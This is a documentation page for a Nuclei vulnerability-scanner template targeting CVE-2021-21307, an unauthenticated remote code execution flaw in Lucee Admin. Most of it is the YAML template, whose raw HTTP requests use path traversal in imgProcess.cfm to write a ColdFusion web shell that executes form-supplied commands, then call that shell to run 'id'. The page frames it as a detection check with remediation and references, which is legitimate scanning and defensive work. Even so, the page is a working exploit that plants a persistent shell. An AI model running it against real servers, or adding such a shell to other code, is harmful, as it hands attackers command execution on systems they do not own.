Skip to content
Nuclei Templates

Lucee Admin - Remote Code Execution

ID: CVE-2021-21307

Severity: critical

Author: dhiyaneshDk

Tags: cve2021,cve,rce,lucee,adobe

Description

Section titled “Description”

Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2021-21307


info:
  name: Lucee Admin - Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
  reference:
    - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
    - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
    - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response
    - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-21307
    cwe-id: CWE-862
    epss-score: 0.97313
    epss-percentile: 0.99874
    cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: lucee
    product: lucee_server
  tags: cve2021,cve,rce,lucee,adobe


http:
  - raw:
      - |
        POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        imgSrc=a
      - |
        POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        imgSrc=
        <cfoutput>


        <table>
        <form method="POST" action="">
        <tr><td>Command:</td><td><input type=test name="cmd" size=50
        <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
        <tr><td>Options:</td><td> <input type=text name="opts" size=50
        <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
        <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
        <cfif isdefined("form.timeout")>value="#form.timeout#"
        <cfelse> value="5"</cfif>></td></tr>
        </table>
        <input type=submit value="Exec" >
        </form>
        <cfif isdefined("form.cmd")>
        <cfsavecontent variable="myVar">
        <cfexecute name = "#Form.cmd#"
        arguments = "#Form.opts#"
        timeout = "#Form.timeout#">
        </cfexecute>
        </cfsavecontent>
        <pre>
      # HTMLCodeFormat(myVar)# </pre> </cfif> </cfoutput>
      - |
        POST /lucee/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded


        cmd=id&opts=&timeout=5


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "groups="
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        regex:
          - "(u|g)id=.*"
# digest: 490a00463044022014a214ab29d500e2c06c3fc5f1c4a043a0fa6463b16a7e2b472718050a7fb927022045402d53673b394b566bd9bf0a73db9313c4cfa5b60a45dffa958b2b124c3ed9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21307.yaml"

View on Github